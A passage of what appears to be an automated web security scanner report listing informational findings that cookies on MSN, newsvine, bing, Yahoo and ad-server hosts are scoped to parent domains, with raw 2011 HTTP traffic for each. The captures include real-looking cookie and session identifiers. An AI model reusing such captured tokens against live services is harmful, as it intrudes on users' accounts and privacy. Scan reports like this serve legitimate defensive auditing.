P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=603578c5dd754321a5d5f718e6e3719e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=0F1C39FCE6A54EAF8026C0BE98EE9363; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:02 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.208. http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:14 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3dac27f13e6f43ddbdd099e1136b2ed6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=C971D4F5C5424720A741D6E2B244FC0D; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:13 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.209. http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/TV/Reality-show-and-housewives.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/TV/Reality-show-and-housewives.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:30 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=57c44e4f157449418f258835ff8a2157; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=697F387490984D5091A88C7D9264CF7B; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:30 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.210. http://specials.redacted/IEIncreaseFont_preview.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /IEIncreaseFont_preview.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /IEIncreaseFont_preview.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:54 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=0506a602688945e5ad28ee84c22b5f61; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=80780BE1B7C941D18D9BC03C02043CA7; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:54 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.211. http://specials.redacted/alphabet.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /alphabet.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alphabet.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:56 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=f2b9f9c8edf64a949f8339bbfbc006f6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8F837BE9C6D04544883F495E86A13FAC; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:56 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 25485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.212. http://suzanne-choney.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://suzanne-choney.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: suzanne-choney.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=6046a552d588b2b1ca9c2098d0a526d4; expires=Sat, 25-Jan-2031 02:19:28 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 79989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...

16.213. http://technolog2.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog2.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: technolog2.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:53:12 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=4d47ba7c4a967234cfe2368b17e3e89b; expires=Sat, 25-Jan-2031 02:53:12 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 83448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...

16.214. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 01:51:08 GMT
Location: http://search.mylife.com/wp-people/?s_cid=DIS70b79249d87148edb59e29f186dfc0b753aa0a7422bf4444a8f1fff785ffedf1
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ac1=51f37.61f6d=0129111951; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0|c51F37:61F6D_0_0_0_20BC47_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 30 Jan 2011 01:51:08 GMT
Content-Length: 226
Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:56:08 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://search.mylife.com/wp-people/?s_cid=DIS70b79249d87148edb59e29f186dfc0b753aa0a7422bf4444a8f1fff785ffedf1">here</
...[SNIP]...

16.215. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396875340721; ts=1/29/2011+12:42:58+AM; z=4; sid=43118469-708a-43ea-a596-af6467b86b10; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 30 Jan 2011 01:29:45 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 30 Jan 2011 01:29:44 GMT
Content-Length: 43
Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:34:45 GMT;path=/

GIF89a.............!.......,...........D..;

16.216. http://toddkenreck.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toddkenreck.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: toddkenreck.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:57:39 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=c66a118e1fcbecd5b536a96e40929013; expires=Sat, 25-Jan-2031 02:57:39 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 66367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...

16.217. http://top.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://top.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: top.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:00:36 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate,Host
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=91e5bf02a7007c2a6827929e99162d52; expires=Sat, 25-Jan-2031 03:00:36 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...

16.218. http://top.newsvine.com/users

Summary

Severity:   Information
Confidence:   Certain
Host:   http://top.newsvine.com
Path:   /users

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /users HTTP/1.1
Host: top.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:58:16 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate,Host
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=a08b4d7ef3970ad6780f87b910dbac7c; expires=Sat, 25-Jan-2031 02:58:16 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 25806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...

16.219. http://tv.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tv.redacted
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: tv.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 69709
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=dfa3666ab2b24263815b585d8424c2c2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:51:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN TV: Ho
...[SNIP]...

16.220. http://tv.redacted/tv/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tv.redacted
Path:   /tv/article.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tv/article.aspx?news=625552&gt1=28103 HTTP/1.1
Host: tv.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 54757
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=62ae4f15c8c0486a828bffcaa09140f2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:51:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Source: Sh
...[SNIP]...

16.221. http://us.mc1125.mail.yahoo.com/mc/compose

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.mc1125.mail.yahoo.com
Path:   /mc/compose

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mc/compose HTTP/1.1
Host: us.mc1125.mail.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:08 GMT
Set-Cookie: B=eb61ua56k9fa0&b=3&s=19; expires=Tue, 29-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://login.yahoo.com?.src=ym&.done=http%3A%2F%2Fus.mc1125.mail.yahoo.com%2Fmc%2Fcompose
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private
Age: 0
Connection: close
Via: HTTP/1.1 r17.ycpi.ac4.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5


16.222. http://redcated/CNT/iview/299297287/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/299297287/direct

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CNT/iview/299297287/direct;pc.106028736;wi.300;hi.120/01?click= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: MUID=AD04D6F8B2FF44629973BD0674351135

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 261
Content-Type: text/html
Expires: 0
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296343597-3954973; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 29 Jan 2011 23:26:37 GMT

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/199711109/299297287/direct;pc.106028736;wi.300;hi.120/01" onclick="(new Image).src='http://t.redcated'"><img src="http://ec.a
...[SNIP]...

16.223. http://wbenedetti.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wbenedetti.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: wbenedetti.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:05:09 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=37e0e82eb5225aaf39e58b2c59ea3714; expires=Sat, 25-Jan-2031 03:05:09 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 80810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...

16.224. http://www.bing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 28803
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:03 GMT
Connection: close
Set-Cookie: _SS=SID=116E16B4881F4F76A93BF81949677C2F; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca7a8f284da884884a06f8cb36768c20c; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...

16.225. http://www.bing.com/challenge

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /challenge

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /challenge HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/challenge
Cache-Control: max-age=0
Origin: http://www.bing.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178; RMS=F=O; MUID=DC63BAA44C3843F38378B4BB213E0A6F; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=SM=1&MS=1621031&D=1593447&AF=NOFORM
Content-Length: 210

encanswer=E376D841E2A5505191B255EB573C7490ECAC704AF7599F66EF723B9ACE4866E711F100C9257803D4E056382B5EA70E8F&query=%252fvideos%252fresults.aspx&IG=83a9fd7913fd45e19c7f20da5201b519&useranswer=9zem2&submi
